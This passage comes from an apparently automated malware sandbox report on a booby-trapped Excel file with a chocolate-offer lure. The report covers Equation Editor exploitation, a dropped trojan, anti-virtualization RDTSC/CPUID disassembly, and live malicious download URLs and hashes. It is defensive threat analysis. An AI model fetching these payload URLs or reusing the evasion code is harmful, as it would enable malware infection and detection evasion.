    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsxStream path 'EncryptedPackage' entropy: 7.99876914636 (max. 8.0)

    Malware Analysis System Evasion:

    barindex
    Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E28A0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7D3E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7503
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E2379
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E27A4
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002E8CAB second address: 00000000002E8CAB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+00000253h], edx 0x00000010 mov edx, 83A23224h 0x00000015 cmp bh, ch 0x00000017 test ah, dh 0x00000019 xor edx, B23AA633h 0x0000001f xor edx, 5BA5550Bh 0x00000025 test ch, 00000068h 0x00000028 sub edx, 6A3DC11Ch 0x0000002e test cx, dx 0x00000031 cmp dword ptr [ebp+00000253h], edx 0x00000037 mov edx, dword ptr [ebp+00000253h] 0x0000003d jne 00007F28A87C6F98h 0x0000003f dec ebx 0x00000040 xor edx, edx 0x00000042 mov eax, ebx 0x00000044 test si, 634Bh 0x00000049 mov ecx, D06366DFh 0x0000004e test bx, cx 0x00000051 sub ecx, D6A7F971h 0x00000057 cmp ecx, ecx 0x00000059 xor ecx, 335F4321h 0x0000005f sub ecx, CAE42E4Bh 0x00000065 test ebx, edx 0x00000067 div ecx 0x00000069 pushad 0x0000006a rdtsc
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002E8CAB second address: 00000000002E8CAB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+00000253h], edx 0x00000010 mov edx, 83A23224h 0x00000015 cmp bh, ch 0x00000017 test ah, dh 0x00000019 xor edx, B23AA633h 0x0000001f xor edx, 5BA5550Bh 0x00000025 test ch, 00000068h 0x00000028 sub edx, 6A3DC11Ch 0x0000002e test cx, dx 0x00000031 cmp dword ptr [ebp+00000253h], edx 0x00000037 mov edx, dword ptr [ebp+00000253h] 0x0000003d jne 00007F28A87C6F98h 0x0000003f dec ebx 0x00000040 xor edx, edx 0x00000042 mov eax, ebx 0x00000044 test si, 634Bh 0x00000049 mov ecx, D06366DFh 0x0000004e test bx, cx 0x00000051 sub ecx, D6A7F971h 0x00000057 cmp ecx, ecx 0x00000059 xor ecx, 335F4321h 0x0000005f sub ecx, CAE42E4Bh 0x00000065 test ebx, edx 0x00000067 div ecx 0x00000069 pushad 0x0000006a rdtsc
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002E750B second address: 00000000002E752A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4E5E24E1h 0x00000007 xor eax, 256A0EB4h 0x0000000c xor eax, 6B41C15Ch 0x00000011 xor eax, 0075EB08h 0x00000016 cpuid 0x00000018 popad 0x00000019 pushad 0x0000001a mov ecx, 000000F8h 0x0000001f rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E542E rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 824Thread sleep time: -300000s >= -30000s
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E542E rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E504C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7D3E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7106 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7D06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E322C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E3259 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E2EF7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E6B69 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E27A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002E7337 cpuid
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery41Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery313VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe43%ReversingLabsWin32.Trojan.Vebzenpak
    C:\Users\Public\vbc.exe43%ReversingLabsWin32.Trojan.Vebzenpak

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin0%Avira URL Cloudsafe
    http://180.214.239.39/process/.svchost.exe100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://kinmirai.org/wp-content/bin_inUIdCgQk163.bintrue
    • Avira URL Cloud: safe
    		unknown
    http://180.214.239.39/process/.svchost.exetrue
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.day.com/dam/1.0F70A7842.emf.0.drfalse
      		high

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      180.214.239.39
      		unknownViet Nam
      		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:452495
      Start date:22.07.2021
      Start time:14:01:33
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 7m 26s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:2
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/13@0/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 53%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/452495/sample/MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

      Simulations

      Behavior and APIs

      TimeTypeDescription
      14:03:18API Interceptor69x Sleep call for process: EQNEDT32.EXE modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      180.214.239.39new order requirment-21 July.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/service/.svchost.exe
      Booking Confirmation.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/network/.svchost.exe
      CMA-CGM BOOKING CONFIRMATION.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/disk/.svchost.exe
      MTIR21487610_0062180102_20210714081247.PDF.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/user/.svchost.exe
      MTIR21487610_0062180102_20210714081247.PDF.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/cpu/.svchost.exe
      Booking Confirmation.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/port/.svchost.exe
      6306093940.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/ssh/.svchost.exe
      6306093940.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/mssn/.svchost.exe

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNDHL 07988 AWB 202107988.xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      new order requirment-21 July.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      SKM_C258201001130020005057R1RE.jarGet hashmaliciousBrowse
      • 103.133.104.124
      Booking Confirmation.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      RFQ- 7075-T6 ( PLASTIC MOULD POLY INDUSTRIES 02993 INQUIRE).xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      shipping document.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      DHL 07988 AWB 202107988.xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      CMA-CGM BOOKING CONFIRMATION.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      SO-19844 EIDCO.ppamGet hashmaliciousBrowse
      • 103.141.137.204
      qHuGyYm6MV.exeGet hashmaliciousBrowse
      • 103.133.104.146
      INV 2429.xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      PROFORMA_INVOICE.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      MTIR21487610_0062180102_20210714081247.PDF.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      kung.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      kung.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      SYHPpy5x6D.exeGet hashmaliciousBrowse
      • 103.133.104.146
      Swift.xlsxGet hashmaliciousBrowse
      • 103.133.104.146
      S&P-RFQ #2004668.xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      NEW ORDER.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      MTIR21487610_0062180102_20210714081247.PDF.xlsxGet hashmaliciousBrowse
      • 180.214.239.39

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:downloaded
      Size (bytes):246888
      Entropy (8bit):4.648392883751036
      Encrypted:false
      SSDEEP:1536:HrnnnnnnnnnnnnnnnrKDnnnnnnnnnnnnnnnCnnnnnnnnnnnnnnXnnnnnnnnnnnnE:H6LVbA8nT1vnv9dnj6czcW
      MD5:C937FC9ED4325E6AB24D49A3175F3A5C
      SHA1:00439295920E78ECAC31D1DBF7EB67118D76299A
      SHA-256:D54CAFC1CA36D0DDD134F53D033EBBAAA490721D62D4168106A9B6C7CFA200BA
      SHA-512:FF13A5D3BFD503E0F11C9D974A4AC88F965EEC14CBF07723AC9ED425222AAA7C5871A6438CD7491FBD694424EBE4C8675DC076E81564204583336A2940E9A9D0
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 43%
      Reputation:low
      IE Cache URL:http://180.214.239.39/process/.svchost.exe
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....\S.................0...p......0........@....@.........................................................................t0..(....P...T..........X.......................................................(... ....................................text....$.......0.................. ..`.data........@.......@..............@....rsrc....T...P...`...P..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15AA81A0.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\302029DA.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\302CBFD.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
      Category:dropped
      Size (bytes):62140
      Entropy (8bit):7.529847875703774
      Encrypted:false
      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
      MD5:722C1BE1697CFCEAE7BDEFB463265578
      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F3E78AE.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5898FC13.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):94963
      Entropy (8bit):7.9700481154985985
      Encrypted:false
      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
      MD5:17EC925977BED2836071429D7B476809
      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
      Malicious:false
      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75E4675B.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):7608
      Entropy (8bit):5.077529457823583
      Encrypted:false
      SSDEEP:96:+Si3EL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:50UjU+H3tWa6WdTfOYLpR8d
      MD5:877A9BFE4326CA64857F36D83F6A133A
      SHA1:840AE4701E7688FBA69DD6EF00D1BA411EFD4279
      SHA-256:C3F4CE75A96355CAFA0CED3BFD3281F5B209B1C66F66927DB647364F62BB2F59
      SHA-512:6A02EB2BA6CC3972FF7A482D4E0EC88C0DA36BA7899AFD0BBDDFA089CC23E6AA0ED5B0304A52B674A93E3A3EFC09C3AEBCCED8506AE3D88EDC7E1E968B0DFA8F
      Malicious:false
      Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X...0...d.....................u.`.u....p....\.....u.......u...u....p......u..6Pv...p....`..p....$y.v..............u....v....$.....a.d.......D.u..^.p.....^.p.........(......-.....u..<.v................<.>v.Z.v....X..o...............................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1EE5521.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
      Category:dropped
      Size (bytes):62140
      Entropy (8bit):7.529847875703774
      Encrypted:false
      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
      MD5:722C1BE1697CFCEAE7BDEFB463265578
      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
      Malicious:false
      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B33F74D7.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):94963
      Entropy (8bit):7.9700481154985985
      Encrypted:false
      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
      MD5:17EC925977BED2836071429D7B476809
      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
      Malicious:false
